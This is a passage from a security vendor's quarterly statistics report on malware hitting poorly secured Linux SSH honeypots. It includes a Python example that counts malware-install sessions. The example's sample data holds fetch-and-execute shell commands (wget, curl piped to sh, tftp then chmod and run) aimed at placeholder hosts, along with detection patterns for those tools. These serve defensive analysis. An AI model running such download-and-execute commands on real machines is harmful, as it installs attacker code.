Statistical Report on Malware Targeting Linux SSH Servers in Q2 2025
Overview
AhnLab SEcurity intelligence Center (ASEC) uses honeypots to respond to and classify brute force or dictionary attacks targeting poorly managed Linux SSH servers. This report covers the status of attack sources identified in the second quarter of 2025 based on logs, as well as statistics on the attacks performed by these attack sources. It also categorizes the malware used in each attack and summarizes the statistical details.
Statistics
1. Status of Attacks on Linux SSH Servers
The following are statistics on attacks against Linux SSH servers identified through AhnLab’s honeypot logs in the second quarter of 2025. The worm malware P2PInfect accounted for 50.0% of attacks and Tsunami for 38.5%; together, these 2 types of malware made up over 80% of attacks.

Figure 1. Attacks on Linux SSH servers in the 2nd quarter of 2025
The “Attack source” category refers to the number of systems used in attacks by malware or threat actors, in other words, systems for which the execution of actual malware installation commands has been confirmed. ASEC honeypots collect logs related to attacks targeting poorly managed Linux SSH servers, defined here as environments vulnerable to brute force or dictionary attacks due to poorly configured account credentials. If a login succeeds on such an inadequately managed system, the malware or threat actor can gain control over it.
The “Attack status” category shows the number of times threat actors or malware attacked the system. Attacks on poorly managed Linux SSH servers begin with scanning. After scanning, most attack attempts end either once account credentials have been obtained through brute force or dictionary attacks, or after the subsequent phase of collecting basic information. This report summarizes statistics based only on cases that go beyond this stage and have confirmed logs of malware being installed.
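The counting rule described above, shown as an added example that is not ASEC's code or data: sessions that stop at credential guessing or information gathering are excluded, and only sessions with install commands contribute to the attack count and to the distinct attack sources. The session format, the sample records and the fetch-plus-execute heuristic for recognizing an installation are all assumptions made for illustration.

```python
import re
from collections import Counter

# Heuristic (assumption, not from the report): a session counts as a malware
# installation when it both fetches a remote file and makes or runs an executable.
FETCH = re.compile(r"\b(?:wget|curl|tftp|ftpget)\b")
EXEC = re.compile(r"\bchmod\b|\|\s*(?:ba)?sh\b|(?:^|[;&\s])\./", re.M)

# Constructed honeypot sessions: (source IP, login succeeded, commands after login).
SESSIONS = [
    ("192.0.2.10", False, []),
    ("192.0.2.11", True, ["uname -a", "cat /proc/cpuinfo"]),
    ("192.0.2.12", True, ["uname -a", "wget http://example.invalid/x -O /tmp/x",
                          "chmod +x /tmp/x", "/tmp/x"]),
    ("192.0.2.12", True, ["curl -s http://example.invalid/y | sh"]),
    ("192.0.2.13", True, ["cd /tmp; tftp -g -r z 198.51.100.5; chmod 777 z; ./z"]),
]

def classify(login_ok, commands):
    """Return the furthest stage a session reached."""
    if not login_ok:
        return "credential_attack"      # scanning / password guessing only
    text = "\n".join(commands)
    if FETCH.search(text) and EXEC.search(text):
        return "malware_install"        # the only stage the report's statistics count
    return "info_gathering"             # logged in, but no install commands seen

def summarize(sessions):
    """Count attacks and distinct attack sources, keeping only install sessions."""
    stages = Counter()
    sources = set()
    for ip, login_ok, commands in sessions:
        stage = classify(login_ok, commands)
        stages[stage] += 1
        if stage == "malware_install":
            sources.add(ip)             # one source may attack many times
    return {"attack_sources": len(sources),
            "attacks": stages["malware_install"],
            "stages": dict(stages)}

if __name__ == "__main__":
    print(summarize(SESSIONS))
```

The source 192.0.2.12 appears in two install sessions, so it adds two attacks but only one attack source, which is why the two figures differ.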